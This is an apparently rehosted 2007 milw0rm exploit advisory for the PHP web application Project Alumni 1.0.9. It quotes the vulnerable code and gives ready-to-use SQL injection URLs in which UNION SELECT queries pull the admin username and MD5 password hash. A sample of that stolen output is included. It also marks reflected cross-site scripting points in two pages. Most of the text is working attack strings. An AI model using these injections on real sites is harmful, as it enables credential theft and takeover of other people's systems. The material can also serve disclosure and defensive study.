project alumni 1.0.9 Remote XSS SQL Injection Vulnerability by h3m4n

VIEWS: 70 PAGES: 2

									                          project alumni 1.0.9 Remote XSS SQL Injection Vulnerability                             Page 1/2
   1   project−alumni sql injection & xss
   2   author : tomplixsee
   3   tomplixsee@yahoo.co.id
   4
   5   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
   6   affected software version       : project alumni v1.0.9, v1.0.8, or lower??
   7   download                        : https://sourceforge.net/projects/project−alumni/
   8
   9
  10   vulnerability
  11   =============
  12
  13   1.sql injection
  14   ++++++++++++++++
  15   condition: magic_quotes_gpc = off
  16
  17   vulnerable code on view.page.inc.php:
  18   $result = dbQuery("SELECT * FROM ‘".getConfigVal("sqlTablePrefix",2)."_users‘ WHERE ‘alumniYear‘ = ’".$_GET[’year’]."
       ’");
  19
  20   reason: bad filtering
  21   exploit:
  22   http://victim/path/index.php?act=view&year=2003’ union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1
       ,1,1,1,1 from alumni_users where ID=’1
  23
  24   result example:
  25   +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−+
  26    |      Name                                            |       Email            |
  27   +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−+
  28    |      tomplixsee (1) f25a2fc72690b780b2a14e140ef6a9e0 |       Not Available              |
  29   +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− −−+−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−+
  30   tomplixsee is admin’s username and f25a2fc72690b780b2a14e140ef6a9e0 is md5 encrypt from admin’s password.
  31
  32
  33   vulnerable code on news.page.inc.php
  34   $result = dbQuery("SELECT * FROM ‘".getConfigVal("sqlTablePrefix",2)."_class_news‘ WHERE ‘year‘ = ’".$_GET[’year’]."’
       ");
  35
  36   reason: bad filtering
  37   exploit:
  38   http://victim/path/index.php?act=news&year=2003’ union select 1,2,3,4,5,6,alumniPassword,8,9 from alumni_users where
       ID=’1
  39
  40   2.xss
  41   ++++++
  42   vulnerable code:
  43
  44   ________________________________________________________________________________
  45   #/xml/index.php                                                                 #
tomplixsee                                                                                                         11/24/2007
                       project alumni 1.0.9 Remote XSS SQL Injection Vulnerability              Page 2/2
  46   #                                                                                #
  47   #        <?php                                                                   #
  48   #        if(isset($_GET["year"])){                                               #
  49   #                $year = $_GET["year"];                                          #
  50   #        }                                                                       #
  51   #        if($year==’FRND’)                                                       #
  52   #                $yearText = "Friends of ".getConfigVal("schoolAbbr",2)." Alumni";   #
  53   #        else                                                                    #
  54   #                $yearText = "Class of $year";                                   #
  55   #        ?>                                                                      #
  56   #        .....                                                                   #
  57   #        <?php echo"$yearText";?>                                                #
  58   #        .....                                                                   #
  59   #                                                                                #
  60   #exploit:                                                                        #
  61   #http://victim/path/xml/index.php?year=<xss>                                     #
  62   #_______________________________________________________________________________#
  63   # view.page.inc.php                                                              #
  64   #                                                                                #
  65   #        <?php if(!$_GET[’year’]) { ?>                                           #
  66   #        ....                                                                    #
  67   #        <?php } else if ($_GET[’year’] < getConfigVal("alumniStartYear",2)) { ?>#
  68   #        ....                                                                    #
  69   #        <?php } else { ?>                                                       #
  70   #        <h2>Alumni for the Graduating Year of <?php echo $_GET[’year’] ?></h2> #
  71   #                                                                                #
  72   #exploit                                                                         #
  73   #http://victim/path/index.php?act=view&year=<xss>                                #
  74   #_______________________________________________________________________________#
  75
  76
  77   salam untuk:
  78   anak−anak jaringan sukabirus, teman−teman di stt telkom, komunitas jasakom,
  79   sibalbal, crutz_ao, bidulux, akillers 179...........
  80
  81   # milw0rm.com [2007−11−24]




tomplixsee                                                                                      11/24/2007

								
To top